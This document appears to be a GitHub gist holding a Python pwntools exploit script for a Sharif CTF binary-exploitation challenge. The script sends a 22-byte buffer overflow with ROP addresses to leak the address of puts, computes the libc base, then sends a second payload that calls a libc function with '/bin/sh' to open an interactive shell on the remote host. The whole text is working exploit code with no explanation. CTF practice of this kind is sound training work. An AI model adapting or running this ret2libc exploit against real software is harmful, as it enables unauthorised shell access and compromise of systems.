/sharif-pwn1.py
Created Feb 4, 2018
| #!/usr/bin/python | |
| import pwn | |
| import struct | |
| OFFSET_HEADSHOT = struct.pack("<L",0x080483A0) | |
| OFFSET_RETN = struct.pack("<L",0x080484EA) | |
| OFFSET_PLT = struct.pack("<L",0x08049874) | |
| OFFSET_ROPBREAK = struct.pack("<L",0x41424344) | |
| p = pwn.remote("ctf.sharif.edu",4801) | |
| # p = pwn.process("./vuln4") | |
| # x = raw_input("Press enter to continue") | |
| p.recv() | |
| p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n") | |
| data = p.recv() | |
| OFFSET_PUTS = struct.unpack("<L",data[0:4])[0] | |
| OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0 | |
| OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0) | |
| OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b) | |
| print "puts at : %x" % OFFSET_PUTS | |
| # print "libc at : %x" % OFFSET_LIBC | |
| p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n") | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment